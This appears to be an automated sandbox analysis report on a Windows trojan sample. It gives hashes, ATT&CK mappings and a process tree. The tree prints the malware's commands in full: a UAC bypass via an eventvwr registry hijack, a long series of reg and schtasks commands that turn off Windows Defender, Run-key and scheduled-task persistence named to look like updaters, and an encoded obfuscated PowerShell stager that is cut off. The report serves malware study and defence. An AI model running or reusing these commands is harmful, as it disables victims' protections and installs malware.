14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67

Analysis

max time kernel
14s
max time network
151s
platform
windows7_x64
resource
win7v20201028
submitted
25-02-2021 00:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe
Size

257KB
MD5

f56e80ea9e01670963449ac451af7510
SHA1

7bf3a3bda2c0d6ef24dabd49c18d6da70957517f
SHA256

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67
SHA512

53200aef8c9635c1069e0d364404172c52e1a6e9a6185c61b383e94dcf761e8ded5663982cf67d768c87879346862b07e0d7a7161b442e5b3234b553543067ab

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Executes dropped EXE 2 IoCs

Processes:

Load.exerun.exe

pid process

1848 Load.exe
960 run.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

pid	process
1848	Load.exe
960	run.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\#OneDriveUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\run.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 9 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Load.exe"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\mscfile	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

316 reg.exe
1556 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

run.exe

pid process

960 run.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

916 powershell.exe
916 powershell.exe
1968 powershell.exe
1968 powershell.exe
1716 powershell.exe
1716 powershell.exe

pid	process
316	reg.exe
1556	reg.exe

pid	process
960	run.exe

pid	process
916	powershell.exe
916	powershell.exe
1968	powershell.exe
1968	powershell.exe
1716	powershell.exe
1716	powershell.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

WMIC.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.execmd.execmd.exeeventvwr.exeLoad.execmd.exe

description	pid	process	target process
PID 1852 wrote to memory of 1160	1852	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 1852 wrote to memory of 1160	1852	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 1852 wrote to memory of 1160	1852	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 1852 wrote to memory of 1160	1852	14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe	cmd.exe
PID 1160 wrote to memory of 2020	1160	cmd.exe	cmd.exe
PID 1160 wrote to memory of 2020	1160	cmd.exe	cmd.exe
PID 1160 wrote to memory of 2020	1160	cmd.exe	cmd.exe
PID 2020 wrote to memory of 1984	2020	cmd.exe	WMIC.exe
PID 2020 wrote to memory of 1984	2020	cmd.exe	WMIC.exe
PID 2020 wrote to memory of 1984	2020	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 1312	1160	cmd.exe	cmd.exe
PID 1160 wrote to memory of 1312	1160	cmd.exe	cmd.exe
PID 1160 wrote to memory of 1312	1160	cmd.exe	cmd.exe
PID 1160 wrote to memory of 604	1160	cmd.exe	find.exe
PID 1160 wrote to memory of 604	1160	cmd.exe	find.exe
PID 1160 wrote to memory of 604	1160	cmd.exe	find.exe
PID 1160 wrote to memory of 316	1160	cmd.exe	reg.exe
PID 1160 wrote to memory of 316	1160	cmd.exe	reg.exe
PID 1160 wrote to memory of 316	1160	cmd.exe	reg.exe
PID 1160 wrote to memory of 1496	1160	cmd.exe	eventvwr.exe
PID 1160 wrote to memory of 1496	1160	cmd.exe	eventvwr.exe
PID 1160 wrote to memory of 1496	1160	cmd.exe	eventvwr.exe
PID 1496 wrote to memory of 1848	1496	eventvwr.exe	Load.exe
PID 1496 wrote to memory of 1848	1496	eventvwr.exe	Load.exe
PID 1496 wrote to memory of 1848	1496	eventvwr.exe	Load.exe
PID 1496 wrote to memory of 1848	1496	eventvwr.exe	Load.exe
PID 1160 wrote to memory of 744	1160	cmd.exe	reg.exe
PID 1160 wrote to memory of 744	1160	cmd.exe	reg.exe
PID 1160 wrote to memory of 744	1160	cmd.exe	reg.exe
PID 1848 wrote to memory of 616	1848	Load.exe	cmd.exe
PID 1848 wrote to memory of 616	1848	Load.exe	cmd.exe
PID 1848 wrote to memory of 616	1848	Load.exe	cmd.exe
PID 1848 wrote to memory of 616	1848	Load.exe	cmd.exe
PID 616 wrote to memory of 1964	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1964	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1964	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1256	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1256	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1256	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1204	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1204	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1204	616	cmd.exe	reg.exe
PID 616 wrote to memory of 864	616	cmd.exe	reg.exe
PID 616 wrote to memory of 864	616	cmd.exe	reg.exe
PID 616 wrote to memory of 864	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1764	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1764	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1764	616	cmd.exe	reg.exe
PID 616 wrote to memory of 684	616	cmd.exe	reg.exe
PID 616 wrote to memory of 684	616	cmd.exe	reg.exe
PID 616 wrote to memory of 684	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1888	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1888	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1888	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1948	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1948	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1948	616	cmd.exe	reg.exe
PID 616 wrote to memory of 852	616	cmd.exe	reg.exe
PID 616 wrote to memory of 852	616	cmd.exe	reg.exe
PID 616 wrote to memory of 852	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1716	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1716	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1716	616	cmd.exe	reg.exe
PID 616 wrote to memory of 1560	616	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe
"C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\84C9.tmp\84CA.tmp\84CB.bat C:\Users\Admin\AppData\Local\Temp\14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67.bin.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get caption,version /format:csv
3⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic os get caption,version /format:csv
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Microsoft Windows 7 Professional "
3⤵
PID:1312

C:\Windows\system32\find.exe
find " 10 "
3⤵
PID:604

C:\Windows\system32\reg.exe
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Users\Admin\AppData\Roaming\Load.exe" /f
3⤵
- Modifies registry class
- Modifies registry key
PID:316

C:\Windows\system32\eventvwr.exe
eventvwr.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Users\Admin\AppData\Roaming\Load.exe
"C:\Users\Admin\AppData\Roaming\Load.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DDE.tmp\8DDF.tmp\8DE0.bat C:\Users\Admin\AppData\Roaming\Load.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
6⤵
PID:1964

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
6⤵
PID:1256

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
6⤵
PID:1204

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
6⤵
PID:864

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
6⤵
PID:1764

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
6⤵
PID:684

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
6⤵
PID:1888

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
6⤵
PID:1948

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
6⤵
PID:852

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
6⤵
PID:1716

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
6⤵
PID:1560

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
6⤵
PID:2032

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
6⤵
PID:1132

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
6⤵
PID:1552

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
6⤵
PID:1840

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
6⤵
PID:1604

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
6⤵
PID:652

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
6⤵
PID:1984

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
6⤵
PID:1284

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
6⤵
PID:604

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
6⤵
PID:1484

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
6⤵
PID:784

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
6⤵
PID:364

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:1472

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:428

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
6⤵
PID:2040

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:2036

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:968

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:2000

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:1036

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
6⤵
- Modifies security service
PID:1156

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
6⤵
PID:588

C:\Windows\system32\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
- Modifies registry key
PID:1556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -force
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Windows\System32" -force
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdater /TR 'C:\Users\Admin\AppData\Roaming\run.exe' /SC minute /mo 60}
6⤵
PID:428

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDriveUpdater" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\run.exe" /f
6⤵
- Adds Run key to start application
PID:2040

C:\Users\Admin\AppData\Roaming\run.exe
C:\Users\Admin\AppData\Roaming\run.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:960

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE68.tmp\AE69.tmp\AE6A.bat C:\Users\Admin\AppData\Roaming\run.exe"
7⤵
PID:1556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noP -sta -w 1 -enc IAAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZQBUACcALAAnAFMAJwApACAAIABOAEUAYgAgACAAKAAgACAAWwB0AHkAcABlAF0AKAAiAHsANAB9AHsAMwB9AHsAMQAzAH0AewA4AH0AewA5AH0AewA1AH0AewA2AH0AewAxADEAfQB7ADIAfQB7ADEAMAB9AHsAMAB9AHsAMQB9AHsAMQAyAH0AewA3AH0AIgAtAEYAJwBTACcALAAnAHQAUgBJAE4ARwAnACwAJwBkAGkAYwBUAGkATwBOAEEAUgB5ACcALAAnAGwAJwAsACcAQwBvACcALAAnAHMALgAnACwAJwBnAEUATgBFAHIAJwAsACcAdAAnACwAJwBUAEkAbwAnACwAJwBuACcALAAnAFsAJwAsACcAaQBDAC4AJwAsACcALABzAFkAcwB0AEUATQAuAE8AYgBKAEUAQwAnACwAJwBMAGUAYwAnACkAIAApACAAIAA7ACAAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAVABFAG0AJwAsACcASQAnACwAJwBTAGUAVAAtACcAKQAgACgAIgBWACIAKwAiAEEAUgBJACIAKwAiAGEAYgBsAGUAOgBvADgAMgBqACIAKQAgACAAKABbAFQAeQBQAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAEYAIAAnAHMAQwByACcALAAnAEkAUABUAGIATABPACcALAAnAGMASwAnACkAIAAgACkAOwAgACAALgAoACcAUwB2ACcAKQAgACAAMQBpAFEANgAgACgAIABbAFQAeQBwAEUAXQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBSAEUAJwAsACcARgAnACkAKQAgADsAIAAgACAAJgAoACIAewAzAH0AewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAFIAaQBhAEIAJwAsACcAYQAnACwAJwBMAGUAJwAsACcAcwBlAHQALQB2ACcAKQAgADAARQBTADYAIAAoACAAIABbAFQAWQBwAEUAXQAoACIAewAzAH0AewA1AH0AewAxAH0AewA2AH0AewAwAH0AewA3AH0AewAyAH0AewA4AH0AewA0AH0AIgAtAEYAJwAuAG4AZQB0AC4AJwAsACcARQAnACwAJwBDAGUAUABPAGkAbgB0AE0AYQBOAEEARwAnACwAJwBzAFkAUwAnACwAJwBSACcALAAnAHQAJwAsACcAbQAnACwAJwBTAEUAcgBWAGkAJwAsACcAZQAnACkAKQAgACAAOwAgACAAJAAzAGIAMgAgACAAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGcAJwAsACcAbgBjAG8ARABJAG4AJwAsACcAdABFAFgAdAAuAEUAJwApACAAOwAgACAAIAAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcARQAnACwAJwBTACcALAAnAFQALQBWAGEAUgBJAEEAQgBMAGUAJwApACAATABqAG0AaQBxADYAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBDAG8AJwAsACcATgB2AGUAUgB0ACcAKQApACAAIAA7ACAAIAAgAC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBhAEIATABFACcALAAnAFMAZQBUAC0AVgAnACwAJwBBAHIAaQAnACkAIAAgACgAJwBSAGgAbAAnACsAJwBOAEUAJwArACcAQwAnACkAIAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQB7ADQAfQAiACAALQBmACAAJwBVACcALAAnAC4ATgBFACcALAAnAHQALgBXAGUAYgByAEUAcQAnACwAJwBzAFkAcwB0AGUATQAnACwAJwBlAFMAdAAnACkAIAApACAAOwAgACAAIAAgACQATwA2AEEAOABsAD0AIABbAFQAeQBwAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAwAH0AewA2AH0AewAxAH0AewAzAH0AIgAgAC0AZgAnAC4AbgBFAHQALgBjAFIAJwAsACcARQAnACwAJwBTAHkAJwAsACcAbgBUAEkAYQBMAGMAYQBjAGgAZQAnACwAJwBTAFQAJwAsACcAZQBtACcALAAnAEUARAAnACkAOwAgACAAIAAkAGkAYwA5ADcAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA1AH0AewAyAH0AewA0AH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAdAAnACwAJwAuAGUATgBDAE8AZAAnACwAJwBzACcALAAnAEkAbgBnACcALAAnAFQARQBtAC4AVABlAHgAJwAsACcAUwBZACcAKQAgACAAOwBJAGYAKAAkAHsAcABzAGAAVgBlAFIAYABzAEkATwBOAHQAQQBCAEwARQB9AC4AIgBwAGAAcwBWAGUAUgBgAHMASQBvAE4AIgAuACIATQBBAGAAagBPAHIAIgAgAC0AZwBlACAAMwApAHsAJAB7ADIAQwBgADgAYABlADEAfQA9ACAAKAAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBBACcALAAnAHYAYQBSAGkAJwAsACcAYgBMAGUAJwApACAAIAAoACIAMQBJAFEAIgArACIANgAiACkAKQAuAFYAQQBMAHUARQAuACIAQQBzAGAAUwBgAEUAbQBiAEwAWQAiAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdABUAHkAcABlACcALAAnAEcARQAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADAAfQB7ADEAfQB7ADcAfQB7ADYAfQB7ADQAfQAiAC0AZgAgACcAbgB0AC4AQQB1AHQAJwAsACcAbwBtAGEAdABpACcALAAnAFMAJwAsACcAZwBlAG0AZQAnACwAJwBzACcALAAnAHkAcwB0ACcALAAnAHQAaQBsACcALAAnAG8AbgAuAFUAJwAsACcAZQBtAC4ATQBhAG4AYQAnACkAKQAuACIARwBlAFQARgBJAGUAYABsAGQAIgAoACgAIgB7ADEAfQB7ADQAfQB7ADUAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADIAfQB7ADMAfQAiACAALQBmACcAdABpACcALAAnAGMAJwAsACcAZwAnACwAJwBzACcALAAnAGEAYwBoACcALAAnAGUAZAAnACwAJwBuACcALAAnAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAAnACkALAAnAE4AJwArACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAGMAJwAsACcAbwAnACwAJwBuAFAAdQAnACwAJwBiAGwAaQBjACwAUwB0AGEAdABpACcAKQApADsASQBGACgAJAB7ADIAYwBgADgARQAxAH0AKQB7ACQAewBDAEEAYAA0AGAANwA4AH0APQAkAHsAMgBgAGMAOABgAGUAMQB9AC4AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBlACcALAAnAEcAZQBUAFYAJwAsACcAQQBsAHUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAbgB1AGAAbABMAH0AKQA7AEkARgAoACQAewBDAGAAQQA0AGAANwA4AH0AWwAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAIAAnAFMAYwByACcALAAnAGkAcAAnACwAJwB0AEIAJwApACsAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG4AZwAnACwAJwBvAGcAZwBpACcALAAnAGwAbwBjAGsATAAnACkAXQApAHsAJAB7AEMAQQA0AGAANwA4AH0AWwAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHAAJwAsACcAUwBjAHIAaQAnACwAJwB0AEIAJwApACsAKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACcAaQAnACwAJwBsAG8AYwAnACwAJwBuAGcAJwAsACcAawBMAG8AZwBnACcAKQBdAFsAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACAAJwBuACcALAAnAEIAJwAsACcARQAnACwAJwBhAGIAbABlAFMAYwByAGkAcAB0ACcAKQArACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBnACcALAAnAGcAaQBuACcALAAnAGwAbwBjAGsATABvAGcAJwApAF0APQAwADsAJAB7AEMAYABBADQANwA4AH0AWwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAGMAcgBpACcALAAnAHAAdABCACcAKQArACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiAC0AZgAgACcAbwBjAGsATAAnACwAJwBnACcALAAnAGwAJwAsACcAbwBnAGcAaQBuACcAKQBdAFsAKAAiAHsANAB9AHsAMwB9AHsAMQB9AHsANwB9AHsANgB9AHsAOAB9AHsAMgB9AHsAMAB9AHsAOQB9AHsANQB9ACIAIAAtAGYAIAAnAG4ATABvAGcAZwAnACwAJwBpACcALAAnAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvACcALAAnAGEAYgBsAGUAUwBjAHIAJwAsACcARQBuACcALAAnAGcAJwAsACcAdABCACcALAAnAHAAJwAsACcAbAAnACwAJwBpAG4AJwApAF0APQAwAH0AJAB7AHYAYABBAEwAfQA9ACAAKAAgACAAJgAoACcAbABzACcAKQAgACAAVgBhAHIAaQBBAGIAbABFADoATgBlAGIAKQAuAHYAQQBMAHUARQA6ADoAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBXACcALAAnAE4AZQAnACkALgBJAG4AdgBvAGsAZQAoACkAOwAkAHsAdgBgAEEAbAB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEQAJwAsACcAQQBkACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANAB9AHsAMQB9AHsAMwB9AHsAMAB9A